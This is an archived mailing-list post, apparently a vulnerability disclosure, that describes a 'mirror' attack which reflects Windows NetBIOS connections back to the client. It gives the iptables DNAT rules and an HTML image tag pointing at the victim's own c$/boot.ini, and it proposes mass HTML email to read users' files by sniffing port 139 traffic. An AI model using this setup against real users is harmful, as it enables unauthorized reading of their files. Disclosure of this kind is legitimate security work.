"Mirror" attacks on windows clients

[Joao Gouveia <tharbad () kaotik org>]

Hi all,

Last night I was debguging a netbios connection between two machines and
I remembered of something real simple and "stupid".
I can't recall of reading anything on the subject but fact is i didn't
do any kind of research, so sorry if this is a known issue.

Mirroring Netbios connections from windows clients.

Lacking a better term, I'm calling this "mirror" because the idea is to
put a windows client talking Netbios with him self.

I've prepared a simple iptables based firewall on a linux box, so that
beeing 10.10.10.1 the firewall external interface and 10.10.10.2 the
windows client, this simple rules apply(may wrap):

-A PREROUTING -t nat -s 10.10.10.2 -d 10.10.10.1 -p tcp -m tcp --dport
139 -j DNAT --to-destination 10.10.10.2:139
-A POSTROUTING -o eth0 -j MASQUERADE

Basically, what this does (obviously) is "mirror" the connections to
port 139 of the firewall from the windows client to that same port on
the windows client, causing it in fact to be talking Netbios with him
self.

The Netbios connection is established and authenticated successfully,
wich allows me to sniff on the (unencrypted) traffic on the linux box.

So, If the user on the windows workstation visits a web page on my linux
box that has (for example) <IMG SRC="file://10.10.10.1/c$/boot.ini"> he
will in fact be reading his own "boot.ini", and will be able to read it
also by dumping the port 139 traffic on my firewall.

Now, this sonds really simple and "stupid", and of course there's a
strong possibility that I'm looking at this from a totally wrong
perspective, if so I am sorry, but doesn't this look like it allows me
to send a html mail to 10000 windows/outlook users and use this to read
arbitrary files on their workstations ( either by looking at the
traffic, or coding a simple program that parses the netbios traffic)?


Best regards,

Joao Gouveia
------------
tharbad () kaotik org

Attachment: signature.asc
Description: This is a digitally signed message part